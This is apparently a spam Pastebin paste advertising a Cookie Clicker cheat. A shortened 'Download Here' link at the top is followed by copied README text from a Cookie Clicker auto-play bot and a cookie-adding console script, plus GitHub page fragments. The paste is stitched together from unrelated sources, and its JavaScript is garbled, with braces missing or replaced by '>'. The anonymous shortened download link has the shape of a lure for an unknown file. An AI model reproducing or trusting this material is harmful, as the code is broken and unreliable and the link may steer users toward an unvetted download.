Advertisement
Guest User

Cookie cliker cheat

a guest
Nov 10th, 2024
104
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.25 KB | None | 0 0
  1. -
  2. Download Here --> https://tinyurl.com/y9f2w95m (Copy and Paste Link)
  3.  
  4.  
  5.  
  6.  
  7.  
  8.  
  9. Cookie Bot
  10. Cookie Bot is an add-on you can load into Cookie Clicker, that will do an automatic playthrough for Cookie Clicker. It does not cheat (but see below) and it is not strictly speaking a third-party tool in the sense of cookie clicker, but it allows you to get all achievements needed for a complete playthrough.
  11. The tool is designed to mimic a human player, and it avoids being super-human in terms of clicking speed and possible moves. This includes also not playing at night, i.e. from 23:00 until 07:00. For the night mode, if possible, the golden switch is used together with fitting spirits in order to maximize output.
  12. In most cases, the bot uses the same interface as a human player. Some achievements take very long time or are even impossible with the regular game interface. In these cases, the bot accesses the internal game parameters and cheats the game. Cheats are activities that are not possible from the user interface.
  13. Cookie Bot will start wherever you are in your game and continue to a complete playthrough.
  14. Current version
  15. You can see the current version, and a full history of all versions and what they changed by consulting the releases page.
  16. What it does
  17. Cookie Bot plays through the complete game of Cookie Clicker. This will take about two months, depending a lot on randomness in the game itself. See also the FAQ for more details. It indicates its current steps when you hover over the version text of it (bottom left of screen).
  18. Limitations
  19. It is not claimed that Cookie Bot uses the best strategy possible. The idea is to use one strategy that works in all cases. That being said, please feel free to suggest improvements.
  20. Cookie Bot does not combine well with imports. If you want to run it on another game, first reload cookie clicker and get rid of the bot, then import, and finally reload the bot.
  21. Usage
  22. Bookmarklet
  23. Copy this code and save it as a bookmark. Paste it in the URL section. To activate, click the bookmark when the Cookie Clicker game is open.
  24. javascript: (function () Game.LoadMod('https://prinzstani.github.io/CookieBot/cookieAutoPlay.js'); >());
  25. If (for some reason) the above doesn’t work, try pasting everything after the javascript: bit into your browser’s console.
  26. You can also try the beta version with the following code (No guarantees whatsoever).
  27. javascript: (function () Game.LoadMod('https://prinzstani.github.io/CookieBot/cookieAutoPlayBeta.js'); >());
  28. Userscript
  29. Cookie Bot can also be activated via script in Tampermonkey (or Greasemonkey). This script will automatically load Cookie Monster every time the original game loads. Check your browsers/plugin’s documentation for how to add a userscript. This script is courtesy of SearchAndDestroy.
  30. // ==UserScript== // @name Cookie Bot // @namespace https://github.com/prinzstani/CookieBot // @include http://orteil.dashnet.org/cookieclicker/ // @version 2.01 // @author prinzstani // @grant none // ==/UserScript== var code = "(" + (function() var checkReady = setInterval(function() if (typeof Game.ready !== 'undefined' && Game.ready) Game.LoadMod('https://prinzstani.github.io/CookieBot/cookieAutoPlay.js'); clearInterval(checkReady); > >, 1000); >).toString() + ")()"; window.eval(code);
  31. If you are using the beta, use this instead:
  32. // ==UserScript== // @name Cookie Bot Beta // @namespace https://github.com/prinzstani/CookieBot // @include http://orteil.dashnet.org/cookieclicker/ // @version 2.01 // @author prinzstani // @grant none // ==/UserScript== var code = "(" + (function() var checkReady = setInterval(function() if (typeof Game.ready !== 'undefined' && Game.ready) Game.LoadMod('https://prinzstani.github.io/CookieBot/cookieAutoPlayBeta.js'); clearInterval(checkReady); > >, 1000); >).toString() + ")()"; window.eval(code);
  33. Steam
  34. Cookie Bot can be used in the Steam version by creating a new folder and 2 files within it. These scripts are courtesy of thelmexx. Create a folder in the \resources\app\mods\local folder named CookieBot and add these 2 files within it.
  35. info.txt:
  36. "Name": "CookieBot", "ID": "cookie bot", "Author": "prinzstani", "Description": "Cookie Bot is an add-on you can load into Cookie Clicker, that will do an automatic playthrough for Cookie Clicker.", "ModVersion": 2.030, "GameVersion": 2.042, "Date": "13/09/2021", "Dependencies": [], "Disabled": 1 >
  37. main.js:
  38. Or for the beta: Game.LoadMod('https://prinzstani.github.io/CookieBot/cookieAutoPlayBeta.js');
  39. Alternative Install
  40. Alternatively, you can download the files CookieBot4Steam.zip or CookieBotBeta4Steam.zip , extract it, and place it in your \resources\app\mods\local .
  41. Bugs and suggestions
  42. Any bug or suggestion should be created as an issue in the repository for easier tracking. This allows to follow the status of the issue.
  43. All suggestions are welcome, even the smallest ones.
  44. Before submitting a bug report, please reload the bot, as it is continuously improved. Maybe the bug is already fixed. When you do report a bug, please make sure to include the following information.
  45.  
  46. Version number of Cookie Clicker and of Cookie Bot, also indicating whether you use the beta or not.
  47. Description of the Problem
  48. Export save of the status when the problem arises.
  49.  
  50. Contributors
  51.  
  52. Prinz Stani: Original author and current maintainer
  53. SearchAndDestroy: Tampermonkey script
  54. AlexFolland: Options and small fixes
  55. corvidian: Elder handling and optimization
  56. troycomi: Savings, cookie monster integration
  57. See also the list of commit contributors
  58.  
  59. We need more contributors. Please contact [email protected] if you are interested.
  60. AntsyBoi/Cookie-Clicker-Script
  61. This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
  62. Name already in use
  63. A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
  64. Sign In Required
  65. Please sign in to use Codespaces.
  66. Launching GitHub Desktop
  67. If nothing happens, download GitHub Desktop and try again.
  68. Launching GitHub Desktop
  69. If nothing happens, download GitHub Desktop and try again.
  70. Launching Xcode
  71. If nothing happens, download Xcode and try again.
  72. Launching Visual Studio Code
  73. Your codespace will open once ready.
  74. There was a problem preparing your codespace, please try again.
  75. Latest commit
  76. Git stats
  77. Files
  78. Failed to load latest commit information.
  79. README.md
  80. A small cookie clicker script to add cookies at a set rate and amount. The original script can be found in my other antsyboi.github.io repository at /files/ccscript.js
  81.  
  82. Open up the developer console on your browser of choice while in cookie clicker
  83. Paste in the entire script from script.js
  84. Run the function "cheat" with the amount of cookies per turn and the time in-between additions (in milliseconds)
  85. Kill all running instances of cheat by setting "killswitch" to one
  86. Run wipe() to reset all save data except name
  87.  
  88. cheat(200, 100) // Adds 200 cookies every 100 milliseconds killswitch = 1 // To stop all instances of the cheat killswitch = 0 // To allow use of the cheat again wipe() // Wipes all save data
  89. About
  90. A small cookie clicker script to add cookies at a set rate and amount
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement